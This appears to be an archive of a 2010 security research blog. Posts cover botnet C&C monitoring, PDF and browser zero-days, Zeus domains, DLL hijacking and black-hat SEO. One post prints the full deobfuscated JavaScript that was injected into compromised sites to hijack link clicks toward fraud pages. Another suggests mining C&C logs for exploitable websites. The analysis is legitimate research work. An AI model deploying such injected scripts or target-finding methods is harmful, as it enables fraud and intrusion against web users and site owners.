Wednesday, December 29, 2010

some considerations on Ettercap source code repository breach

Recently it’s been released a new issue of a zine called “owned and exposed” ( I have to admit I laughed a lot when I saw this picture.


I think that the picture above is the truth of what the security field is today. Anyway , ending my personal considerations, I would show you a mind map that I made during a past research on web bot based botnet and that could be useful to understand how is possible find and use entry point in some very important web sites. As starting point I decided to focusing all the big picture on a generic bot source code. Given a bot is possible,  Googling enough and with some scripting language knowledge, make the rest.


This mind map is not so obvious as well is not so clear what are the links with the title of this post. I will try to describe what I intend with this process represented by this mindmap . During a research of some months ago, I have try to identify 3 contexts where a researcher (color independent)  could be found useful information for raise the level of details. In other words, starting from a bot source code analysis , you are on the first context (1 code analysis). In this context the analysis has generated information like authors (not so useful in this case), code snippet (useful for googling for other bot derived from the analyzed bot for example), crew (again not so useful), and c&c server (VERY USEFUL).

So with code snippet and c&c server is possible try to find many more information. Specifically with a c&c server that command web based bot, sometimes, is possible looking what happens in the c&c channel and coding and running, for example, a fake bot for catching them. The fake bot is linked to the c&c channel (usually an irc server) and start to log everything. The analysis process of what was logged put your mind in the 2nd context (named “intelligence”) . What could be founded is shown in the leafs of 2nd context. From the information gathered from a c&c  is possible to  known, for example, what are the web sites exposed  to a particular Remote File Include. Collecting many of these web site your mind is leaded in the 3rd context.

Usually you have to decide only what do you want to do with the exposed website list obtained from the 2nd context and thanks to someone (bot admin) which launch , for example, bots specialized for scanning for checking if a web site is prone to a specific issue. What is the link with Ettercap (and other cases reported by the zine “owned and exposed” ? If you are the main coder of a project and you decide to put this code in a source repository that expose to the users, exploitable web apps (like for example some old release of e107 csm prone to a remote code execution condition) is possible choose once (or more) of the leafs of the 3rd context. In other words, logging the tons of c&c channels is possible found many other famous web site exposed to this problems.

The following little screenshot make all more clear (I hope). What you see is the result of a fake bot that I coded months ago. In particular, the result of this fake bot is a log file where are logged all message in a c&c channel. The grep command it was launched on this log file. How can see on sourceforge some users accounts offer access to a vulnerable version of the popular CMS e107 (


One note: I decided to put the owning activities in the “counter measures” leaf beacuse  "good and evil" is just a matter of who does things.

For the moment it’s all. Maybe that I will pubblish some more explanation for this process as soon as possible.  Feedback and question are welcome.

Counter measures: don’t expose users with bugged web apps!.

Tuesday, December 14, 2010

LOIC - Crafted C&C Channel Topic Could Lead A Crash

Following the trend of these days I played (locally) with one of the latest release of LOIC (Low Orbit Ion Cannon DDOS Tool). Inserting a long (not so) string on the topic of a C&C irc channel, there seems to be a memory corruption condition.

 The screen shot above show a crafted topic that trigger the issue. The impacted tested released is the A few more details related to the .NET exception:

Some important notes: I saw on twitter that someone has retweet this post adding "remote code execution".  I never speak about a "remote code execution" condition for this issue.  

Anyway IMHO this issue could be insert in the counter measures list for this kind of threats. Act from a client side perspective some times maybe useful.

Tuesday, November 30, 2010

cve-2010-4091 exploited ? – 0.2 – Adobe Reader 9.3.0

Starting from the malwaretracker sample (see my previous posts) seem that edx and ecx are set to some interesting values:


Thursday, November 25, 2010

cve-2010-4091 exploited ? – 0.1

Trying to reversing the shell code contained within the PDF that seem exploit CVE-2010-4091, in according with the sample reported by MalwareTracker, it’s been founded the following URL:


From Robtex:


The URL above at this time is down or not more available. Did really exploited for retrieve malware from ? :) .  Many Thanks to binjo for his support and tools.  For the PDF check my previous post: 

All this things continues to be weird and funny! (WOMENS-PUZZLE.COM :-) ).  IMPORTANT: The PDF reported is not sure that exploit, really, the CVE-2010-4091

Friday, November 19, 2010

cve-2010-4091 exploited ?

November 24,  2010 – Update:

Looking for other  exploiting attempts I found a Malwaretracker sample where the PDF seem spread via URL that contains:  filepdf.php@v=zday


The following analysis report the objects used within this PDF (that is different from the fulldisclosure PDF):

November 22 , 2010 – update:

Some interesting (and useful) notes about the original full disclosure PDF PoC published on full disclosure mailing list:

Who’s looking for eggs in your PDF?

November 19, 2010:

This is my latest result. Seem that with a crafted PDF as explained by Haifei Li in his paper (see previous posts for reference), the code flow looks like could be hijacked. At least I have this impression from the debugger response as you can see in this screen shot:


feedback and suggestion are welcome. Some notes: this is only an attempt to try to understand better this issue.  My mistakes in this stage are very likely.

Thursday, November 11, 2010

cve-2010-4091 – printSeps - exploitation attempts

November 26, 2010 – update:
This is a very useful  presentation (from Immunity Sec) where is possible get some methods for approach the reversing of  Java script engine in Adobe Reader context:

Attacking Embedded Languages

November 16, 2010 – update:
In previous post I didn’t report where is the place in the AcroRD32.dll where the memory corruption is triggered (as result of the use after free bug).  The following screen shot is the leak screen shot:


At first view, the AcroRd32.dll offset 0094450, seem a zone involved with Acro Heap Manager, so this could confirm some of my doubts for the question like “where to play whit this bug ?”. So, IMHO, this bug is due from the double handling mechanism of the heap. In other words what the OS heap management has previously freed may be that the Adobe Heap Manager try to free again with the result as show.  I hope to release a more detailed analysis as soon as possible.

November 11, 2010
In my previous post (  it’s been followed  the timeline and what is called exposure time for this bug that seem have a bit strange history. After my initial analysis,  only few details has been released about. But after play a bit with this flaw I can confirm once of the latest and most clear comments fromVUPEN via Twitter:

exploiting the PDF printSeps was complicated. It involves allocating/freeing chained blocks before triggering the flaw

After this tweet I started to looking for more informations about. So IMHO a good support for “allocating/freeing before trigger” the flaw may be get from” heaplib” as well documented in

Is possible fitting the heaplib.js for Adobe Reader and insert inside a crafted PDF for obtaining the heap handling ? For this goal code be usefull play with what is called Acro Managing Pool. A very interesting reference is from a Fortinet researcher:

The heaplib.js for Internet Explorer is here:

Anyway what I could say from my experience with this flaw is that the PDF posted on full disclosure seem leaks of something and using a debugger may lead you on the wrong way sometimes. Are only ideas which could be wrong as well right. Feedback are welcome.

Thursday, November 4, 2010

full disclosure xpl.pdf Adober Reader 9.4 poc - printSeps() - cve-2010-4091

November 26,2010 – Update:

Thank you, Mario, but our printSeps() is in another castle !

November 22, 2010 – Update:

Who’s looking for eggs in your PDF?  (reported also in  cve-2010-4091 exploited ?)

November 16, 2010 – Update:

Security updates available for Adobe Reader and Acrobat – ABSP10-28

November 9, 2010 – Update:

Adobe  PSIRT released - CVE-2010-4091

US-CERT response:

November 8, 2010 – Update 2:

VUPEN confirms the "remote code execution"

November 8, 2010 – Update 1:

Some screenshots of my brief analysis for this bug.  The vtable where is referenced the PrintSeps() method:

the location where the Javascript code is being processed:
Where Adobe Reader 9.4 crash after PrintSeps is processed:

November 5, 2010 – Update:

emerging threats Snort sign

eEye report as remote code execution

Adobe response:

November 4, 2010:
The vulnerable method seem: printSeps():

more info:

The original xpl.pdf is retrived via




Wednesday, November 3, 2010

CVE-2010-3962 - yet another Internet Explorer RCE

Update - November, 12 2010:
Amnesty International Hong Kong Website Injected With Latest Internet Explorer 0-day

Update - November, 5 2010:
CVE-2010-3962 - BindShell proof of concept:

Metasploit Module

More on the IE 0-day - Hupigon Joins The Party

Update - November, 4 2010:
the memory corruption proof of concept is (place the following code as is within a HTML file):


Microsoft Internet Explorer CSS "clip" Attribute Memory Corruption

November, 3 2010:
New IE 0-Day used in Targeted Attacks

The issue seem related to a "use after free" bug when are parsed some CSS tags sequence.
Once of the implicated malware seem a Backdoor.Pirpi variant.

Other links:

Microsoft Security Advisory 2458511 (workaround included)

Thursday, October 28, 2010

CVE-2010-3765 - proof of concept - update

October, 29 1010 - UPDATE: the working exploit (in according with BugX blog):
October, 28 2010
For those who still do not know .. The proof of concept for CVE-2010-3765 is the following:


More details at: The issue seem resolved with Firefox 3.6.12.

As mentioned in some of my old posts reading a bugzilla repository is always a good thing:

Feedback are welcome.

Thursday, October 14, 2010

Some domains for the LICAT / Murofet / Trojan/ZBOT.B threat

Update (2 November): A deep and very itneresting analysis from Trend Micro:

Update (15 October):  ThreatExpert has release the domain name generation algorithm for MUROFET/Licat

(14 October)
I have found some new domains involved in this threat as you can see in the following list:

The 333 value for “s” URL parameter permit to download what is recognized as Trojan/ZBot.B (Symantec name). While the 111 stand for , “get Zeus 2.1 (as named by Zeustracker) config fil"e”. The drop zone is requested with the following syntax:


This malware seem use a C&C domain name generation approach similar to that used by conficker.  For example, the latest domain ( ) seem registered for the 14th of October 2010 malware activity as reported by

The following Anubis Binary Analaysis submission show the behavioral of this malware:

and the ThreatExpert analysis with detection engine info:

The domains above seems hosted by the following IP address:

The following Robtex table permits to retrieve other domains involved:

Wednesday, October 6, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds ( and black hat seo ) – part 0.2

Trying to find some common factors in the pages included in the compromised sites (as indicated in the previous post ( there is evidence of a large number of sites that are suffering the same problem. In particular, using keywords that are common to many of these malicious pages, you have the following results:

As well:

Yet another dork that retrieve very similar URL format:
This can reasonably confirm that this stuff is related to a big (and well organized) Black Hat Seo campaign. Thank you very much for their support to Edgar Tools and author of JJEncode .

Tuesday, October 5, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25,  2011 – Update:
a detailed analysis also where is reported my post:
Internet  Explorer exSploit Milk codes

October 5, 2010:

From MDL forum, I get a post where a user (many thanks to Edgar) has been reported a strange Javascript code injected in some Italian web site. Specifically the message is located at the following URL:
The code that is reported looks like shown in the following screenshot:

At first lookup appears like a nonsense code for who is not a Javascript guru like me. So I decide to try to decode this very interesting code for try to know what this code do.  The first step it’s been try to use some Javascript alert() function call in the prologue code. So  the first lines of code are been modified as following:
The blue pills shown the place where the alert() has been placed. Trying to execute this abstract of code the alert call sequence has generated these results:
The rest of code deobfuscation is obtained placing within a textarea the code referenced by “Function()” as follow:
also the end of obfuscated code must be modified as shown:
Once this modified code is placed in a test HTML page and rendered by Firefox, it’s been obtained this deobfuscated jquery code:
page_links = [];
        function setGlobalOnLoad(f) {
           var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null
           if (root){
              if(root.addEventListener) root.addEventListener("load", f, false)
              else if(root.attachEvent) root.attachEvent("onload", f)
           } else {
              if(typeof window.onload == 'function') {
                 var existing = window.onload
                 window.onload = function() {
              } else {
                 window.onload = f
        function addHandler(object, event, handler) {
          if (typeof object.addEventListener != 'undefined')
            object.addEventListener(event, handler, false);
          else if (typeof object.attachEvent != 'undefined')
            object.attachEvent('on' + event, handler);

        if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {
            var right_browser='yes';
            }else     var right_browser='no';

        function getCookie(c_name)
        if (document.cookie.length>0)
          c_start=document.cookie.indexOf(c_name + "=");
          if (c_start!=-1)
            c_start=c_start + c_name.length+1;
            if (c_end==-1) c_end=document.cookie.length;
            return unescape(document.cookie.substring(c_start,c_end));
        return "";
        var c_index = Math.floor(Math.random() * 5);       
        var fcoo=getCookie('c_first');       
        var exdate=new Date();
        document.cookie='c_first'+ "=" +escape('false')+";expires="+exdate.toUTCString();
        if (c_index==4 && fcoo!='false' && right_browser=='yes') {
            setGlobalOnLoad(function() {
            var block = document.getElementById('mlk');
            var links = block.getElementsByTagName('A');
            for (var i = 0; i < links.length; i++) {
            var links = document.links;
            for (var i = 0; i < links.length; i++) {
                addHandler(links[i], "click", function(event) {
                    var index = Math.floor(Math.random() * (page_links.length - 1));
           = page_links[index];
Update: the code it’s been obuscated using the following encoding script:  (Mowab thank you very much for your support).
The obtained code, at first sight seems a loader of the href object injected in the compromised web page (as shown along). Also the bolded line of code:
var block = document.getElementById('mlk');
is the object assignment which contain the link to the malicious HTML page injected within the compromised hosts. In particular all server listed and reported by the MDL post seems reference URL like these:
The HTML page injected lead to a to a black listed site as credit card fraud. In this case the compromised host analyzed is Calling , for example,
is retrieved this page:
Clicking on one of the download buttons appear a CAPTCHA request as following:
Clicking on download button is called the following URL:

Following the download sequence appear a message that entice the user to signup for download the desired file:

Trying to sign up, is shown a fake promotional message like this:
The checkout action try to contact this website
that is black listed for credit card frauds as noticed by MyWOT  response
I think that the compromised hosts , as reported at the begin of this post, have been implicated for a Black Hat Seo infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.

Wednesday, August 25, 2010

DLL Hijacking - my test cases on a default HP notebook installation - CyberLink products vulnerable

CyberLink products appears like vulnerable. The Cyberlink tools (such as powet2go) exist in the default installation of the HP 64bit notebook (with  Microsoft Windows 7).

. I have check and test the proof of concept generated by dllhijacking. The products are:

- CyberLink PowerDirector v7
- CyberLink Power2Go DVD v6.0

The issue is trigger with the iso,pdl,pds,p2g and p2i file formats, and DLL request by the applications is the mfc71loc.dll or mfc(nationality)71.dll. The exploiting doesn't require the copy of fake dll in app folder (like many others issue released nowadays) but simply putting on current directory where "data" file are loaded. So for example USB flash drive, compressed archive and so on. IMHO, the problem is not related to big vendor or for well known tools and applications (Adobe Reader, Office and so on), instead is very critical in all circumstances where users they don't know what they have on their notebook. I mean the big number of notebooks across the world full of not so known software that maybe exploited in this manner.

From the CyberLink web site (

"CyberLink, a maker of the world-acclaimed DVD player software PowerDVD, also designs multimedia solutions for well-known brands such as DELL, HP, ACER, Medion, Packard Bell, and Dixons, to name a few. PowerDVD can help organizations achieve their business goals with powerful, yet easy-to-use video solutions, and now comes with a Volume License Program to better serve corporate, academic, government, and non-profit customers. Millions of licenses have already been granted to major organizations every year—all of them recognizable household names" .

The following screen shot shown the exploits generated by dllhikacking script:

DLL Hijacking - my test cases

 One of my testcases list on a VM system.

Sorry, you may have found a bug.... (in Fiddler)

Playing with the HD Moore tools for dll hicjacking stuff  (Exploiting DLL Hijacking Flaws) , I found this interesting result on once of my VM:

 I don't know if I have time to spent for a deep investigation about this possible Fiddler bug... but in some cases the side effects are your best friends.

Friday, July 30, 2010

strange .info TLD domains

Looking for something that might attract my attention I found the following URL:

If at a first look may appears like a nonsense URL, googling more I found this message on Symantec community blog where is said something  about:

Seems that this kind of domains are related to a C&C domains array .As always, with Robtex is possible found something more as shown in the following screen shot:

Also it could be found something in MalwareURL DB at the following URL:

As show seems that this domain types are linked with VB.AAG Trojan. The malicious URL appears in the form: .info/DATA but at this time the HTTP response is the following:

I think it can reasonably understand that this could be a system to make it harder for antivirus and IDS/IPS the detection for threats that uses these domain types as well this name convention fit perfectly for javascript obfuscation.

Update (08/31/2010) Another one:

From Robtex:


Tuesday, July 27, 2010


Reading something about this trojan, which use the CVE-2010-2568 as spreading vector, I found that
the binary is located at hxxxp:// The process try to contact the following host:

From Robtex:

Wednesday, June 23, 2010

SpyEye C&C and spreading with Microsoft SpyNet Black Hat Seo technique

The following domain typo squat it's been detected googling the URL:


As know, Spy Net is a Microsoft forum where are discussed new threats, malware and so on.
More info about this service are placed here:

In the following screen shot it's reported result (shown with a smile) from Google:

The red point is the MyWot response for the malicious URL. At the following page the SpyEye admin panel:


The RobTex info about the fake SpyNet domain (and others):

Some notes: - this domain, was already known from MDL and other malicious URL database. Malware Domain List records:

So I think that the interesting thing is the smile that appears as Google result.

An update (7/6/2010): the "smile Google result" is still alive :)

Sunday, June 13, 2010

Wednesday, May 19, 2010

finally PAIMEI

PAIMEI installed. Great framework!.

The following code shown my "hello world!" PAIMEI script: given a process id, basically this script detect the creations of new threads and dump the first 5 assembly instructions for each one. In addition are dumped the process registers values during the CreateThread:

Also, I've found a good resource for learn more about PAIMEI:

Wednesday, March 10, 2010

CVE-2010-0806 - Internet Explorer 6/7 0 day

Some notes about:

Internet Explorer 0-day targeted in spam runs

Targeted Internet Explorer 0day Attack Announced

Robtex queries for the Mcafee reported URLs:


hxxxp:// -

The following exploiter (retrieved from once of the URL posted by McAfee) use Base64 encoding for hiding resources:

This issue it's been detected in the "iepeers.dll". With a good ActiveX fuzzer may be trivial found more info (CLSID: 7E8BC44E-AEFF-11D1-89C2-00C04FB6BFC4). Dranzer seem good enough: try to check for more details.

Metasploit module:

Microsoft Internet Explorer iepeers.dll use-after-free exploit